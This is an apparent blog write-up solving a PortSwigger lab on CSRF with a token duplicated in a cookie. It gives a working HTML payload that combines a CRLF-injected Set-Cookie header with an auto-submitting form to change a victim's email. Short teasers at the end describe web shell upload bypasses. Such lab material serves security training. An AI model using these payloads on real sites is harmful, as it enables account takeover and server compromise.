On this page
apsyleg1 min read
#portswigger #csrf #crlf-injection #web-security

CSRF where Token is Duplicated in Cookie

Lab

CSRF where token is duplicated in cookie · Practitioner

Solution

Given: we have an exploit server and a vulnerable application where we want to change the current user's password while bypassing the CSRF defense.

OK, let's look at how the password change works. We observe that csrf is duplicated in the request body and in the cookies.

Cookies:

csrf=nt0nPbB6pgJTiVTFJeOZqPuOi7sdt3kf; session=FZB4InscWA9YK1iChehZ73tFUts8fZGW

In the body — nt0nPbB6pgJTiVTFJeOZqPuOi7sdt3kf. They match, they're duplicated.

Let's try sending a request where in both places we put xxx instead of the token. The password change succeeds. Looks like we can reuse the payload from the previous lab CSRF where token is tied to non-session cookie.

Only this time we just set any matching values, and in the cookie we write a value for csrf, not csrfKey.

<form id="csrf" action="https://0aad008e030e9e7b826b1f6f001a0081.web-security-academy.net/my-account/change-email" method="POST">
    <input name="email" value="wr3dmast3r@m.com">
    <input name="csrf" value="xxx">
</form>

<img src="https://0aad008e030e9e7b826b1f6f001a0081.web-security-academy.net/?search=x%0d%0aSet-Cookie:%20csrf=xxx%3B%20path=%2F%3B%20SameSite=None%3B%20Secure" onerror="document.getElementById('csrf').submit()">

Lab solved.

More in this category

Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)

.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.

Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)

Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.

Remote Code Execution via Web Shell Upload (PortSwigger Lab)

Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.